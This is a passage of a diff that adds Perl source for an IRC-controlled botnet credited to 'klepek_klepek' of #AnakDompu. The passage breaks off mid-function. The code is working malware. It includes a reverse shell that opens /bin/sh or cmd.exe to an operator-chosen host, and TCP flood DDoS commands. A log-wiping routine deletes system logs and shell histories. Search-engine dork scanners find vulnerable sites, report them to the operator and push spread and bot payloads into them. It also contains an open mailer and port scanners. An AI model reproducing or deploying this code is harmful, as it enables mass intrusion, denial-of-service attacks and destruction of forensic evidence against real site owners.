+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 In public channel just use : 7!xan cd tmp12 for example");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 For help with the linux commands type :!xan 13@4linuxhelp");
+}
+
+if ($funcarg =~ /^portscanner/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 There is a normal portscan and a Nmap:");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4portscan <ip>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4nmap <ip> <beginport> <endport>");
+}
+
+if ($funcarg =~ /^commands/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can use the following commands :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4portscan <ip>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4nmap <ip> <beginport> <endport>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4back <ip><port>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan cd tmp 12 for example");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4udpflood <ip> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4tcpflood <ip> <port> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4httpflood <site> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4linuxhelp");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4spread <scan>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4scan <vuln> <dork>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4system");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4logcleaner");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4sendmail <subject> <sender> <recipient> <message>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4milw0rm");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4join #channel");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4part #channel");
+}
+
+if ($funcarg =~ /^linuxhelp/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Dir where you are : pwd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Start a Perl file : perl file.pl");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Go back from dir : cd ..");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Force to Remove a file/dir : rm -rf file/dir;ls -la");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Show all files/dir with permissions : ls -lia");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find config.inc.php files : find / -type f -name config.inc.php");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all writable folders and files : find / -perm -2 -ls");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all .htpasswd files : find / -type f -name .htpasswd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all service.pwd files : find / -type f -name service.pwd");
+}
+
+######################
+#   End of  Help     #
+######################
+if ($funcarg =~ /^spread\s+(.*)/) {
+$vuln = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Spread Mode] 13,6[1klepek_klepek]11,10[1Memang]13,6[1Cakep] :4 $vuln");
+my $shellurl="http://".$vuln.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$shellurl);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Spread Mode] 11,10[1AnakDompu] :12 $vuln");
+}
+
+############################################
+#   Moded By klepek_klepek AnakDompu @Dalnet     #
+############################################
+
+if ($funcarg =~ /^LoadBotPhp\s+(.*)/) {
+$vuln = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Menjalankan BotPhp] 13,6[1klepek_klepek]11,10[1Memang]13,6[1Cakep] :4 $vuln");
+my $kalampabot="http://".$vuln.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$kalampabot);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Botphp] 11,10[1DiJalanKan] :12 $vuln");
+}
+######################
+#     Commands       #
+######################
+
+if ($funcarg =~ /^system/) {
+$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`;
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Info BOT : Server : 14Cannot View :14 1337");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Uname -a     : 7 $uname");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Uptime       : 7 $uptime");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Own Prosses  : 7 $processo");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] ID           : 7 $id");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Own Dir      : 7 $ownd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] OS           : 7 $distro");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Owner        : 7 klepek_klepek Memang Cakep");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Channel      : 7 #AnakDompu");
+}
+
+if ($funcarg =~ /^milw0rm/) {
+	my @ltt=();
+	my @bug=();
+	my $x;
+	my $page="";
+	my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
+	print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+	my @r = <$socke>;
+	$page="@r";
+	close($socke);
+	while ($page =~  m/<title>(.*)</g){
+	$x = $1;
+	if ($x =~ /\&lt\;/) {
+	$x =~ s/\&lt\;/</g;
+	}
+	if ($x !~ /milw0rm/) {
+	push (@bug,$x);
+	}}
+	while ($page =~  m/<link.*expl.*([0-9]...)</g) {
+	if ($1 !~ m/milw0rm.com|exploits|en/){
+	push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
+	}}
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Milw0rm Bugs]  Latest exploits :");
+	foreach $x (0..(@ltt - 1)) {
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Milw0rm Bugs]14 $bug[$x] -3 $ltt[$x]");
+	sleep 1;
+}}
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+#      Portscan      #
+######################
+
+if ($funcarg =~ /^portscan (.*)/) {
+  my $hostip="$1";
+  my
+  @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
+  my (@aberta, %porta_banner);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Scanning for open ports on  12".$1." started .");
+  foreach my $porta (@portas)  {
+    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
+    'tcp', Timeout => 4);
+    if ($scansock) {
+      push (@aberta, $porta);
+      $scansock->close;
+    }
+  }
+
+  if (@aberta) {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Port Yang Terbuka:5 @aberta");
+    } else {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Tidak Ada Ports Yang Terbuka.");
+  }
+}
+
+######################
+#  End of  Portscan  #
+######################
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+#        Nmap        #
+######################
+   if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
+         my $hostip="$1";
+         my $portstart = "$2";
+         my $portend = "$3";
+         my (@abertas, %porta_banner);
+       sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] :12 $1 11,10[1PoRt] 12 $2-$3");
+       foreach my $porta ($portstart..$portend){
+               my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
+    if ($scansock) {
+                 push (@abertas, $porta);
+                 $scansock->close;
+                 if ($xstats){
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] Founded 12 $porta"."/Open");
+                 }
+               }
+             }
+             if (@abertas) {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] Complete ");
+             } else {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] No open ports have been founded 13");
+             }
+			 }
+######################
+#    End of Nmap     #
+######################
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+#######################
+# Menghapus Log File  #
+#######################
+if ($funcarg =~ /^hapuslog/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Poses Ini Sangat Lama Tunggu Beberapa Saat");
+    system 'rm -rf /var/log/lastlog';
+    system 'rm -rf /var/log/wtmp';
+	system 'rm -rf /etc/wtmp';
+	system 'rm -rf /var/run/utmp';
+	system 'rm -rf /etc/utmp';
+	system 'rm -rf /var/log';
+	system 'rm -rf /var/logs';
+	system 'rm -rf /var/adm';
+	system 'rm -rf /var/apache/log';
+	system 'rm -rf /var/apache/logs';
+	system 'rm -rf /usr/local/apache/log';
+	system 'rm -rf /usr/local/apache/logs';
+	system 'rm -rf /root/.bash_history';
+	system 'rm -rf /root/.ksh_history';
+sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Semua default log Dan File bash_history Akan Di Hapus");
+		sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Sekarang Menghapus Log File Di System");
+	system 'find / -name *.bash_history -exec rm -rf {} \;';
+	system 'find / -name *.bash_logout -exec rm -rf {} \;';
+	system 'find / -name "log*" -exec rm -rf {} \;';
+	system 'find / -name *.log -exec rm -rf {} \;';
+		sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Selesai Semua Logs TeLaH Di BeRsIhKaN");
+      }
+#############################
+# Akhir Menghapus Log File  #
+#############################
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+#       MAILER       #
+######################
+# For mailing use :
+# !xan @sendmail <subject> <sender> <recipient> <message>
+#
+######################
+if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mailer]8,1 Try Sending Mail to :10 $3");
+$subject = $1;
+$sender = $2;
+$recipient = $3;
+@corpo = $4;
+$mailtype = "content-type: text/html";
+$sendmail = '/usr/sbin/sendmail';
+open (SENDMAIL, "| $sendmail -t");
+print SENDMAIL "$mailtype\n";
+print SENDMAIL "Subject: $subject\n";
+print SENDMAIL "From: $sender\n";
+print SENDMAIL "To: $recipient\n\n";
+print SENDMAIL "@corpo\n\n";
+close (SENDMAIL);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mailer]8,1 Successfully Sended to :10 $recipient");
+}
+######################
+#   End of MAILER    #
+######################
+######################
+#  Join And Part     #
+######################
+           if ($funcarg =~ /^join (.*)/) {
+              sendraw($IRC_cur_socket, "JOIN ".$1);
+           }
+           if ($funcarg =~ /^part (.*)/) {
+              sendraw($IRC_cur_socket, "PART ".$1);
+           }
+
+######################
+#End of Join And Part#
+######################
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+#     TCPFlood       #
+######################
+
+if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1TCP DDoS]8,1 13,6[1HaJaR] 10 ".$1.":".$2." Untuk 10 ".$3." detik.");
+  my $itime = time;
+  my ($cur_time);
+  $cur_time = time - $itime;
+  while ($3>$cur_time){
+  $cur_time = time - $itime;
+  &tcpflooder("$1","$2","$3");
+}
+sendraw($IRC_cur_socket,"PRIVMSG $printl :0,113,6[1TCP DDoS] HaJar SeLeSai 10 ".$1.":".$2.".");
+}
+######################
+#  End of TCPFlood   #
+######################
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+#   Back Connect     #
+######################
+if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
+my $host = "$1";
+my $porta = "$2";
+my $proto = getprotobyname('tcp');
+my $iaddr = inet_aton($host);
+my $paddr = sockaddr_in($porta, $iaddr);
+my $shell = "/bin/sh -i";
+if ($^O eq "MSWin32") {
+  $shell = "cmd.exe";
+}
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
+connect(SOCKET, $paddr) or die "connect: $!";
+open(STDIN, ">&SOCKET");
+open(STDOUT, ">&SOCKET");
+open(STDERR, ">&SOCKET");
+system("$shell");
+close(STDIN);
+close(STDOUT);
+close(STDERR);
+if ($estatisticas)
+{
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BackConnect] Konek Ke 10 $host:$porta");
+}
+}
+######################
+#End of  Back Connect#
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+#   EExPreSi SCANNER #
+######################
+######################################################################
+#################### GOOGLE
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+### Start Message
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Memulai]8,18,113,6[1Scan]11,10[1Untuk]8,113,6[1Bug]13,1 $bug 9,1DaN10,1 $dork");
+### End of Start Message
+# Starting The Search Engine
+	my @google=&googlet($dork);
+#
+push(my @tot, @google);
+#
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1GoOglE]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1GoOgLe]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1GoOglE]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :13Vuln:9,1 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1GoOgLe]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### AllTheWeb
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @alltheweb=&allthewebt($dork);
+	my @allweb=&standard($dork);
+#
+push(my @tot, @alltheweb, @allweb);
+#
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AllTheWeb]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]12,1 $dork");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AllTheWeb]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AllTheWeb]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AllTheWeb]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### LYCOS
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @lylist=&lycos($dork);
+push(my @lybyp,@lylist);
+#
+push(my @tot, @lybyp);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1LyCoS]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1LyCoS]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1LyCoS]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1LyCoS]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### Yahoo
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @ylist=&yahoo($dork);
+	my @yalist=&yahooa($dork);
+	my @yblist=&yahoob($dork);
+	my @yclist=&yahooc($dork);
+	my @ydlist=&yahood($dork);
+		push(my @yahoobypass, @ylist, @yalist, @yblist, @yclist, @ydlist );
+#
+push(my @tot, @yahoobypass);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1YaHoO]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1YaHoO]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1YaHoO]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1YaHoO]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MSN
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @mlist=&msn($dork);
+push(my @tot, @mlist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MSN]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MSN]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MSN]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
